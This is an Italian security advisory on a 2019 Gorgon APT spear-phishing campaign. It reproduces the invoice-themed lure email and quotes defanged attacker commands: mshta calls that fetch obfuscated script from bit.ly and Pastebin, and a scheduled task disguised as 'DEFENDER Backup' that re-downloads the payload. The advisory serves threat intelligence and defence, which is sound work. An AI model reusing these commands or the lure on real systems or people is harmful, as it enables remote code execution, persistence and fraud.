Gorgon APT: nuova campagna di spear Phishing

26/09/2019

Apt Gorgon APT Pastebin spear phishing

Gorgon APT,  scoperto nel 2018, è noto per aver attaccato Istituzioni e aziende in tutto il mondo e di recente ha ripreso l’attività con una nuova campagna di spear phishing che si concentra soprattutto in ambito europeo. Come di consueto, la campagna si basa sull’invio di e-mail con allegato un file Excel contenente una macro VBA che si attiva all’apertura del documento avviando la catena di infezione.

Il messaggio di spear-phishing, di recente rilevato dai ricercatori di Heimdal Security, è definito come  nell’esempio riportato di seguito:

Soggetto: Re: Invoice_74521451

Allegato: Invoice_74521451.xls

Contenuto:
Dear Sir
My colleague handling this order is out of office for his vacation.
Please confirm the attached invoice as enabling us to proceed with the payment schedule.
Regards,
Sri Astuti

Un aspetto interessante che ha reso più complicata l’identificazione di questo attacco è l’utilizzo di servizi di condivisione come Pastebin per il download del payload.

Catena di infezione

Secondo i ricercatori, l’APT Gordon si collega a pagine appositamente create su Pastebin per scaricare un codice Javascript / VBA, opportunamente offuscato, eseguendo comandi da shell come da esempio:

  • mshta http: // bit [.] ly / mydahsgkjshwodakiterikus
  • C:\Windows\System32\mshta.exe” http://www.pastebin[.]com/raw/0php6n7G

Il traffico rilevato nel caso analizzato è stato successivamente reindirizzato su ulteriori indirizzi Pastebin tra cui:

  • http: [.] \\ pastebin com \ prime \ TNnFtBjw
  • http: [.] \\ pastebin com \ prime \ 3qUvqbpZ

In seguito il malware crea un’attività pianificata che garantisce che il download ad intervalli:

  • C: \ Windows \ System32 \ schtasks.exe “/ create / sc MINUTE / mo 300 / tn” DEFENDER Backup “/ tr” mshta http: \\ pastebin [.] Com \ raw \ 3qUvqbpZ “

Vengono utilizzati tre metodi di offuscamento degli script: “StrReverse“, “split variables” e “multiple Wscript objects”.

Il payload utilizza la funzione “LoadWithPartialName” tramite “reflection assembly” nel framework NET per scaricare ed elaborare i dati grezzi in memoria.

Si precisa inoltre che il documento XLS dannoso, al momento del rilevamento, era noto ad un numero limitato di antivirus.

Riferimenti a recenti attività da parte del gruppo Gorgon

Di seguito, in lingua inglese, ulteriori riferimenti circa attività di diffusione malware che utilizza tecniche molto simili a quelle sopra indicate:

Indicatori di compromissione

Il CERT-PA fornisce, in formato scaricabile, gli IoC malware riferibili al dominio myownteammana[.]blogspot.com, utilizzato per veicolare il malware della campagna in oggetto.

I dati fanno riferimento al periodo che va da 30 luglio al 23 settembre 2019:

  • IoC (.txt) – Hash
  • IoC (HASHr.txt) – Lista dei soli file hash da utilizzare in combinazione con lo strumento HASHr